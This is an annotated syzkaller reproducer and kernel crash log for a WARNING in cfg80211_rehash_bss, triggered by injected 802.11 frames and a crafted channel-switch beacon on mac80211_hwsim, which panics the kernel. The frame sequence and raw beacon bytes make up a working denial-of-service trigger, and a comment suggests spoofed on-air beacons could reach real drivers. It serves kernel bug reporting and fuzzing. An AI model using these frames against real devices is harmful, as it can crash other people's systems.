# syzkaller reproducer plus kernel console log for a WARNING at net/wireless/scan.c:1666 in
# cfg80211_rehash_bss(). The call trace below shows the path: an injected beacon is processed by
# ieee80211_rx_mgmt_beacon -> ieee80211_sta_process_chanswitch -> cfg80211_ch_switch_notify
# -> cfg80211_update_assoc_bss_entry -> cfg80211_rehash_bss, all on the wiphy workqueue
# (kworker/u4:10, cfg80211_wiphy_work) while wlan1 is associated.
# Impact as logged: the kernel runs with panic_on_warn, so the WARN is escalated to a panic
# (denial of service, "Rebooting in 86400 seconds"). On a kernel without panic_on_warn this is a
# WARN splat plus whatever state the aborted rehash leaves behind.
# NOTE(review): the trigger is an 802.11 beacon carrying channel-switch elements. The log only
# shows mac80211_hwsim, but beacons are ordinary management frames, so an on-air sender spoofing
# the AP's BSSID could presumably reach the same path against a real driver once a station is
# associated — confirm before treating this as a local-only issue.
program:
# The procfs/sysctl/sendfile/FITRIM calls below are presumably fuzzer leftovers unrelated to the
# wireless path (none of them appears in the trace); the reproducer has not been minimized.
r0 = openat$procfs(0xffffffffffffff9c, &(0x7f00000001c0)='/proc/timer_list\x00', 0x0, 0x0)
r1 = openat$sysctl(0xffffffffffffff9c, &(0x7f0000000580)='/proc/sys/net/ipv4/tcp_timestamps\x00', 0x1, 0x0)
sendfile(r1, r0, &(0x7f00000000c0)=0x8b, 0x100000500)
# Generic netlink socket and the nl80211 family id, used for the two nl80211 commands below.
r2 = socket$nl_generic(0x10, 0x3, 0x10)
r3 = syz_genetlink_get_family_id$nl80211(&(0x7f0000000080), 0xffffffffffffffff)
ioctl$FITRIM(r0, 0xc0185879, &(0x7f0000000040)={0xfffffffffffffff8, 0x6, 0x28c})
# Look up the ifindex of wlan1 (the hwsim station; log: local address 08:02:11:00:00:01).
# NOTE(review): r4 is referenced by both sendmsg calls below but is never assigned in this
# listing; syzkaller normally binds it here as `<r4=>0x0`, so the binding was presumably lost
# when the program was rendered on this page.
ioctl$sock_SIOCGIFINDEX_80211(r2, 0x8933, &(0x7f00000000c0)={'wlan1\x00', 0x0})
# NL80211_CMD_SET_INTERFACE on ifindex r4 with NL80211_ATTR_IFTYPE=2 (station).
sendmsg$NL80211_CMD_SET_INTERFACE(r2, &(0x7f0000000100)={0x0, 0x0, &(0x7f0000000140)={&(0x7f0000000180)={0x24, r3, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r4}, @void}}, [@NL80211_ATTR_IFTYPE={0x8, 0x5, 0x2}]}, 0x24}}, 0x0)
# NL80211_CMD_CONNECT to the default syzkaller AP SSID; this starts the auth/assoc sequence that
# the log shows against 08:02:11:00:00:00.
sendmsg$NL80211_CMD_CONNECT(r2, &(0x7f00000001c0)={0x0, 0x0, &(0x7f0000000380)={&(0x7f0000000240)={0x30, r3, 0x5, 0x0, 0x0, {{}, {@val={0x8, 0x3, r4}, @void}}, [@NL80211_ATTR_SSID={0xa, 0x34, @default_ap_ssid}, @chandef_params=[@NL80211_ATTR_WIPHY_FREQ={0x8}]]}, 0x30}}, 0x0)
# Injected frames playing the AP side (addresses device_b -> device_a), so that the station can
# scan, authenticate and associate without a real AP:
#   probe response (so a BSS entry for the SSID exists), short sleep, auth reply, assoc response.
# The log confirms each step: "authenticated", "RX AssocResp ... status=0 aid=1", "associated".
syz_80211_inject_frame(&(0x7f00000002c0)=@device_b, &(0x7f0000000000)=@mgmt_frame=@probe_response={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x20}}, 0x0, @random=0x4, 0x1, @val={0x0, 0x6, @default_ap_ssid}, @val={0x1, 0x1, [{0x2, 0x1}]}, @void, @void, @void, @void, @void, @val={0x71, 0x7, {0x1, 0x1, 0xffffffffffffffff, 0x0, 0xffffffffffffffff, 0xf3}}}, 0x38)
nanosleep(&(0x7f0000000340)={0x0, 0x2faf080}, 0x0)
syz_80211_inject_frame(&(0x7f00000003c0)=@device_b, &(0x7f0000000400)=@mgmt_frame=@auth={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x1}}, 0x0, 0x2, 0x0, @void}, 0x1e)
syz_80211_inject_frame(&(0x7f00000004c0)=@device_b, &(0x7f0000000500)=@mgmt_frame=@assoc_resp={{{}, {}, @device_b, @device_a, @from_mac, {0x0, 0x2}}, 0x1, 0x0, @default, @val, @void}, 0x20)
# First beacon from the (now associated) AP. Relevant elements:
#   0x25 (37, Channel Switch Announcement): mode 0, new channel 2, count 4
#   0x3c (60, Extended CSA): mode 0, operating class 0x3d = 61, channel 0xab, count 5
# The kernel rejects the ECSA element ("cannot understand ECSA IE operating class, 61, ignoring"
# in the log), so the channel switch is presumably driven by the plain CSA element.
# Other elements (0x05, 0x2a, 0x2d HT capabilities, 0x71, 0x76) are carried along; their values
# are not known to matter for the WARN from what this page shows.
syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f00000008c0)=@mgmt_frame=@beacon={{{}, {}, @device_b, @device_b, @from_mac}, 0x0, @default, 0x1, @void, @void, @void, @void, @void, @val={0x5, 0x3, {0x7c, 0x20, 0x8}}, @val={0x25, 0x3, {0x0, 0x2, 0x4}}, @val={0x2a, 0x1, {0x1, 0x1}}, @val={0x3c, 0x4, {0x0, 0x3d, 0xab, 0x5}}, @val={0x2d, 0x1a, {0x8, 0x3, 0x1, 0x0, {0x5, 0x9, 0x0, 0x6, 0x0, 0x1, 0x0, 0x0, 0x1}, 0x6, 0x4, 0x5}}, @void, @val={0x71, 0x7, {0x0, 0x1, 0x0, 0x0, 0x0, 0x2, 0x21}}, @val={0x76, 0x6, {0x0, 0x9, 0x3d, 0x1}}}, 0x64)
# Presumably unrelated noise: a dummy HID USB device (source of the "usb 5-1" lines in the log).
syz_usb_connect$hid(0x0, 0x36, &(0x7f0000000340)=ANY=[@ANYBLOB="12013f00000000407f04ffff0000000000010902"], 0x0)
# Second beacon, hand-crafted as a raw byte blob. The same CSA and ECSA elements are visible in
# the hex ("2503000204" and "3c04003dab05"); the log shows the ECSA rejection a second time
# immediately before the WARNING, so this is the frame that reaches cfg80211_rehash_bss.
syz_80211_inject_frame(&(0x7f0000000300)=@device_b, &(0x7f00000005c0)=ANY=[@ANYBLOB="80000000080211000001080211000001080211000000000000000058a05f916781bf2a00000602020202020205037c200825030002042a01033c04003dab052d1a0800070500000000000000090006001100000000040400000005710700030000000221760600093d000100"], 0x6c)
# Presumably unrelated trailing fuzzer calls.
r5 = socket$kcm(0x2, 0x1, 0x0)
sendmsg$inet(r5, &(0x7f0000000280)={&(0x7f0000000000)={0x2, 0x4001, @remote}, 0x10, 0x0}, 0x20000811)
# --- kernel console log (verbatim; continues on the following lines of the page) ---
[ 87.840655][ T4675] Bluetooth: hci0: command tx timeout [ 88.090583][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.129308][ T5316] wlan1: authenticate with 08:02:11:00:00:00 (local address=08:02:11:00:00:01) [ 88.133281][ T5316] wlan1: send auth to 08:02:11:00:00:00 (try 1/3) [ 88.148931][ T1095] wlan1: authenticated [ 88.151220][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.156657][ T1095] wlan1: associate with 08:02:11:00:00:00 (try 1/3) [ 88.162889][ T1095] wlan1: RX AssocResp from 08:02:11:00:00:00 (capab=0x1 status=0 aid=1) [ 88.167825][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.173342][ T1095] wlan1: associated [ 88.179040][ T1095] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 88.183452][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.434608][ T5316] usb 5-1: new high-speed USB device number 2 using dummy_hcd [ 
88.587248][ T5316] usb 5-1: config 0 has no interfaces? [ 88.589671][ T5316] usb 5-1: New USB device found, idVendor=047f, idProduct=ffff, bcdDevice= 0.00 [ 88.593410][ T5316] usb 5-1: New USB device strings: Mfr=0, Product=0, SerialNumber=0 [ 88.604842][ T5316] usb 5-1: config 0 descriptor?? [ 88.810179][ T1095] wlan1: cannot understand ECSA IE operating class, 61, ignoring [ 88.814905][ T5330] mac80211_hwsim: wmediumd released netlink socket, switching to perfect channel medium [ 88.822587][ T1095] ------------[ cut here ]------------ [ 88.825246][ T1095] WARNING: net/wireless/scan.c:1666 at cfg80211_rehash_bss+0x1e6/0x540, CPU#0: kworker/u4:10/1095 [ 88.829933][ T1095] Modules linked in: [ 88.831812][ T1095] CPU: 0 UID: 0 PID: 1095 Comm: kworker/u4:10 Not tainted syzkaller #0 PREEMPT(full) [ 88.836194][ T1095] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 88.840833][ T1095] Workqueue: events_unbound cfg80211_wiphy_work [ 88.843612][ T1095] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 88.846200][ T1095] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 eb 0b ea f9 84 c0 74 78 e8 82 ec [ 88.854494][ T1095] RSP: 0018:ffffc9000356eee0 EFLAGS: 00010246 [ 88.857127][ T1095] RAX: ffffffff8aafd2b5 RBX: 0000000000000000 RCX: 0000000000000002 [ 88.860762][ T1095] RDX: ffff88803612c980 RSI: 0000000000000000 RDI: 0000000000000000 [ 88.864139][ T1095] RBP: ffff8880114d0468 R08: 0000000000000000 R09: 0000000000000002 [ 88.867725][ T1095] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122101a0 [ 88.871437][ T1095] R13: ffff8880377a0c30 R14: dffffc0000000000 R15: ffff8880114b0420 [ 88.875046][ T1095] FS: 0000000000000000(0000) GS:ffff88808d22f000(0000) knlGS:0000000000000000 [ 88.878769][ T1095] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 88.881596][ T1095] CR2: 00007ffed551afe8 CR3: 
0000000011bef000 CR4: 0000000000352ef0 [ 88.885123][ T1095] Call Trace: [ 88.886694][ T1095] [ 88.888028][ T1095] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 88.890633][ T1095] cfg80211_ch_switch_notify+0x3c1/0x770 [ 88.893643][ T1095] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 88.896928][ T1095] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 88.899809][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 88.902175][ T1095] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 88.904770][ T1095] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 88.907271][ T1095] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 88.909868][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.912218][ T1095] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 88.914859][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.917081][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 88.919396][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.921471][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.923885][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.926145][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 88.928404][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 88.930841][ T1095] ? kcov_remote_start+0x4d3/0x7f0 [ 88.933563][ T1095] ieee80211_iface_work+0x652/0x12d0 [ 88.936077][ T1095] cfg80211_wiphy_work+0x2ab/0x450 [ 88.938485][ T1095] ? process_scheduled_works+0x9ef/0x1770 [ 88.941233][ T1095] process_scheduled_works+0xad1/0x1770 [ 88.943877][ T1095] ? __pfx_process_scheduled_works+0x10/0x10 [ 88.946763][ T1095] worker_thread+0x8a0/0xda0 [ 88.949057][ T1095] kthread+0x711/0x8a0 [ 88.951991][ T1095] ? __pfx_worker_thread+0x10/0x10 [ 88.954478][ T1095] ? __pfx_kthread+0x10/0x10 [ 88.956651][ T1095] ? _raw_spin_unlock_irq+0x23/0x50 [ 88.959069][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 88.961383][ T1095] ? __pfx_kthread+0x10/0x10 [ 88.963459][ T1095] ret_from_fork+0x599/0xb30 [ 88.965440][ T1095] ? __pfx_ret_from_fork+0x10/0x10 [ 88.967881][ T1095] ? 
__pfx_kthread+0x10/0x10 [ 88.970100][ T1095] ret_from_fork_asm+0x1a/0x30 [ 88.972404][ T1095] [ 88.973766][ T1095] Kernel panic - not syncing: kernel: panic_on_warn set ... [ 88.977028][ T1095] CPU: 0 UID: 0 PID: 1095 Comm: kworker/u4:10 Not tainted syzkaller #0 PREEMPT(full) [ 88.981180][ T1095] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 [ 88.985786][ T1095] Workqueue: events_unbound cfg80211_wiphy_work [ 88.988610][ T1095] Call Trace: [ 88.990146][ T1095] [ 88.991406][ T1095] dump_stack_lvl+0x99/0x250 [ 88.993292][ T1095] ? __asan_memcpy+0x40/0x70 [ 88.995199][ T1095] ? __pfx_dump_stack_lvl+0x10/0x10 [ 88.997324][ T1095] ? __pfx__printk+0x10/0x10 [ 88.999277][ T1095] vpanic+0x237/0x6d0 [ 89.001249][ T1095] ? __pfx_vpanic+0x10/0x10 [ 89.003860][ T1095] ? is_bpf_text_address+0x292/0x2b0 [ 89.006731][ T1095] ? is_bpf_text_address+0x26/0x2b0 [ 89.009623][ T1095] panic+0xb9/0xc0 [ 89.011600][ T1095] ? __pfx_panic+0x10/0x10 [ 89.013625][ T1095] ? ret_from_fork_asm+0x1a/0x30 [ 89.015812][ T1095] __warn+0x317/0x4b0 [ 89.017564][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.019865][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.022204][ T1095] __report_bug+0x288/0x500 [ 89.024409][ T1095] ? __pfx_do_raw_spin_lock+0x10/0x10 [ 89.026816][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.029135][ T1095] ? __pfx___report_bug+0x10/0x10 [ 89.031423][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.033666][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.035910][ T1095] report_bug+0x16a/0x220 [ 89.037723][ T1095] ? cfg80211_rehash_bss+0x1e6/0x540 [ 89.039874][ T1095] ? 
cfg80211_rehash_bss+0x1e8/0x540 [ 89.042051][ T1095] handle_bug+0x98/0x200 [ 89.043809][ T1095] exc_invalid_op+0x1a/0x50 [ 89.045689][ T1095] asm_exc_invalid_op+0x1a/0x20 [ 89.047762][ T1095] RIP: 0010:cfg80211_rehash_bss+0x1e6/0x540 [ 89.050415][ T1095] Code: e8 48 c1 e8 03 42 0f b6 04 30 84 c0 0f 85 33 03 00 00 ff 45 00 48 83 c4 18 5b 41 5c 41 5d 41 5e 41 5f 5d c3 cc cc cc cc cc 90 <0f> 0b 90 4c 8b 2c 24 4c 89 ef e8 eb 0b ea f9 84 c0 74 78 e8 82 ec [ 89.059532][ T1095] RSP: 0018:ffffc9000356eee0 EFLAGS: 00010246 [ 89.062471][ T1095] RAX: ffffffff8aafd2b5 RBX: 0000000000000000 RCX: 0000000000000002 [ 89.066443][ T1095] RDX: ffff88803612c980 RSI: 0000000000000000 RDI: 0000000000000000 [ 89.070251][ T1095] RBP: ffff8880114d0468 R08: 0000000000000000 R09: 0000000000000002 [ 89.074043][ T1095] R10: 0000000000000002 R11: 0000000000000002 R12: ffff8880122101a0 [ 89.077958][ T1095] R13: ffff8880377a0c30 R14: dffffc0000000000 R15: ffff8880114b0420 [ 89.081689][ T1095] ? cfg80211_rehash_bss+0xe5/0x540 [ 89.084095][ T1095] cfg80211_update_assoc_bss_entry+0x3fa/0x6a0 [ 89.086856][ T1095] cfg80211_ch_switch_notify+0x3c1/0x770 [ 89.089399][ T1095] ieee80211_sta_process_chanswitch+0xb05/0x2890 [ 89.092311][ T1095] ? __pfx_ieee80211_sta_process_chanswitch+0x10/0x10 [ 89.095417][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 89.097680][ T1095] ieee80211_rx_mgmt_beacon+0x1d6f/0x3230 [ 89.100373][ T1095] ? __pfx_ieee80211_rx_mgmt_beacon+0x10/0x10 [ 89.103132][ T1095] ieee80211_sta_rx_queued_mgmt+0x4ed/0x4520 [ 89.105945][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.108182][ T1095] ? __pfx_ieee80211_sta_rx_queued_mgmt+0x10/0x10 [ 89.111037][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.113266][ T1095] ? do_raw_spin_lock+0x121/0x290 [ 89.115539][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.117930][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.120161][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.122355][ T1095] ? __lock_acquire+0x6b6/0x2cf0 [ 89.124648][ T1095] ? 
do_raw_spin_lock+0x121/0x290 [ 89.126961][ T1095] ? kcov_remote_start+0x4d3/0x7f0 [ 89.129244][ T1095] ieee80211_iface_work+0x652/0x12d0 [ 89.131636][ T1095] cfg80211_wiphy_work+0x2ab/0x450 [ 89.133977][ T1095] ? process_scheduled_works+0x9ef/0x1770 [ 89.136523][ T1095] process_scheduled_works+0xad1/0x1770 [ 89.138981][ T1095] ? __pfx_process_scheduled_works+0x10/0x10 [ 89.141608][ T1095] worker_thread+0x8a0/0xda0 [ 89.143750][ T1095] kthread+0x711/0x8a0 [ 89.145697][ T1095] ? __pfx_worker_thread+0x10/0x10 [ 89.148051][ T1095] ? __pfx_kthread+0x10/0x10 [ 89.150179][ T1095] ? _raw_spin_unlock_irq+0x23/0x50 [ 89.152591][ T1095] ? lockdep_hardirqs_on+0x98/0x140 [ 89.155133][ T1095] ? __pfx_kthread+0x10/0x10 [ 89.157388][ T1095] ret_from_fork+0x599/0xb30 [ 89.159547][ T1095] ? __pfx_ret_from_fork+0x10/0x10 [ 89.161844][ T1095] ? __pfx_kthread+0x10/0x10 [ 89.164014][ T1095] ret_from_fork_asm+0x1a/0x30 [ 89.166159][ T1095] [ 89.167889][ T1095] Kernel Offset: disabled [ 89.169806][ T1095] Rebooting in 86400 seconds..